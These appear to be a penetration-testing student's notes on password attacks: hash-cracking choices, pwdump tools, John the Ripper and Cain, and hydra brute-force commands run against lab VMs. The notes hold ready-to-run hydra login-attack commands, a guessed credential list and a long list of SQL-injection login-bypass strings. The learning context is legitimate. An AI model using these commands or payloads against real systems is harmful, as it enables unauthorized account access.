========================================
book 4 pg 165; file 4.6 31:37
* if you have no access to hashes, consider password guessing (using tools like thc-hydra) or sniffing clear-text passwords or challenge/response exchanges (e.g. Cain, tcpdump, etc.)
* if you have hashes and want to crack the password:
-for salted hashes from Unix-like systems, use traditional password cracking (John the Ripper)
-for LANMAN / NT hashes from Windows, use rainbow tables or traditional password cracking (John or Cain)
* if you have LANMAN challenge/response, NTLMv1 or NTLMv2 captures, use password cracking (Cain)
* if you have LANMAN / NT hashes and SMB access, use pass-the-hash
========================================
file 4.4 3:52 minute
Pwdump tools
a. pwdump3 to pwdump6
b. fgdump
c. pwdump7
========================================
john
* john.pot file = when John cracks a password, it displays the result on the screen and stores it in john.pot. John will not load hashes it has already cracked, based on what is stored in john.pot. No account name is stored: only the password format (hash type tag), the hash and the cracked password.
* john.rec file = John stores its current status in john.rec. The file is updated every 10 minutes so the session can be resumed if John or the system crashes.
* a patch to the John source code extends it to crack NT hashes; compile the NT-capable John with SSE2 support for speed.
* to speed up password cracking, some tools rely on GPU processing, which can be between 10 and 50 times faster than a CPU for password cracking. Most of these tools rely on CUDA (Compute Unified Device Architecture), supported by NVIDIA graphics cards. Free GPU MD5 password cracker at http://bvernoux.free.fr/md5/index.php and the free CUDA Multiforcer, which supports unsalted MD4, MD5 and NT hashes: http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf
(book4 pg 99, file 44 36:00)
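The john.pot layout described above (format tag, hash and plaintext, no account name) means the account mapping has to be rebuilt from the hash file that was fed to John. Added example, not code from the notes or from John itself: it performs that join the way `john --show` does, on constructed sample files (the hashes and passwords are made-up values).

```python
"""Join john.pot back to account names (added example, not from the course notes or John itself).

john.pot holds only the format tag, the hash and the plaintext; the account names are
in the pwdump-style file that was fed to John. This is the join that `john --show`
performs, written out so the logic is visible. All hashes and passwords below are
constructed sample values, not real credentials.
"""
from typing import Dict, Optional, Tuple

# Constructed sample john.pot: LM halves are stored as separate $LM$<16 hex> entries,
# NT hashes as $NT$<32 hex>, each followed by ':' and the cracked plaintext.
SAMPLE_POT = """\
$LM$aabbccddeeff0011:PASSWOR
$LM$2233445566778899:D1
$NT$0123456789abcdef0123456789abcdef:password1
"""

# Constructed pwdump-style lines: user:rid:lmhash:nthash:::
# (aad3b435b51404ee is the well-known hash of an empty LM half.)
SAMPLE_PWDUMP = """\
alice:1001:aabbccddeeff00112233445566778899:0123456789abcdef0123456789abcdef:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

def parse_pot(text: str) -> Dict[str, str]:
    """Return {'$tag$hash': plaintext}; the key is lower-cased so the join is case-safe."""
    cracked: Dict[str, str] = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, plain = line.split(":", 1)  # split once: the plaintext may contain ':'
        cracked[key.lower()] = plain
    return cracked

def show_cracked(pwdump_text: str, pot: Dict[str, str]) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Map each account to (cracked LM password, cracked NT password); None if uncracked."""
    result = {}
    for line in pwdump_text.splitlines():
        fields = line.split(":")
        if len(fields) < 4:
            continue
        user, lm, nt = fields[0], fields[2].lower(), fields[3].lower()
        # LM is cracked as two independent 7-character halves; both must be present.
        half1, half2 = pot.get(f"$lm${lm[:16]}"), pot.get(f"$lm${lm[16:]}")
        lm_plain = half1 + half2 if half1 is not None and half2 is not None else None
        result[user] = (lm_plain, pot.get(f"$nt${nt}"))
    return result
```

Accounts that come back with a plaintext are the ones to flag for a forced reset; an LM entry with one half still missing stays None.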
========================================
Cain (file 4.5 04:00)
* cracks most pwd types that a pen tester will encounter
* it can also sniff packets and capture passwords
* traceroute, port usage, wireless scanner
========================================
>> hydra -l Kent -P hydrapasslist.txt 10.0.1.6 http-post-form "/?page=login:user=^USER^&pass=^PASS^&Login=Login:Login failed" -V
where:
/?page=login => the login page path of the app (the first colon-separated field)
user=^USER^&pass=^PASS^&Login=Login => the POST body; hydra substitutes each candidate into ^USER^ and ^PASS^. The field names come from the target form and could differ, e.g. username and password
Login failed => the failure string (third field); hydra keeps going and reports success for any response that does not contain the text "Login failed"
Brute force web app
http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
https://blog.g0tmi1k.com/dvwa/login/
https://linuxhint.com/crack-web-based-login-page-with-hydra-in-kali-linux/
-didn't work for the doopy vuln machine; showing false positives
===============
hydra for skytower
#-hydra -L hydrauserlist.txt -P hydrapasslist.txt 10.0.1.4 http-post-form "/login.php:email=^USER^&password=^PASS^:F=Login Failed"
--where
--hydrauserlist.txt
popo123
akslda
dasjd
'-'
john@skytech.com
sara@skytech.com
william@skytech.com
JWzXuBJJNy
dasjde1
1dasjd11
--hydrapasslist.txt
popo123
akslda
hereisjohn
dasjd
JWzXuBJJNy
'-'
hereisjohn1
dasjde1
1dasjd11
1senseablesenseable
senseable
ihatethisjob
1hatethisjob
ihateth1isjob
--website : http://10.0.1.4/login.php
email=^USER^&password=^PASS^:F=Login Failed => email and password are the fields on the form/page that the user is expected to fill out. "Login Failed" is the message we get if the user/password aren't correct.
The list below works, but know that hydra will show success with any message that is not the login failure, so the SQL injection alerts came out as false negative; so I changed the command and started looking for the Welcome message with S:. In this case it is a much shorter list but only shows one page, so with the SkyTower VM it didn't show William's or Sara's page, which would have to be discovered from the DB.
--hydrauserlist.txt
source: http://securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
'-'
' '
'&'
'^'
'"'
' or "-'
' or " '
' or "&'
' or "^'
' or "*'
"_"
" "
"&"
"^"
"*"
" or ""_"
" or ""-"
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
--hydrapasslist.txt
'-'
' '
'&'
'^'
'"'
' or "-'
' or " '
' or "&'
' or "^'
' or "*'
"_"
" "
"&"
"^"
"*"
" or ""_"
" or ""-"
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x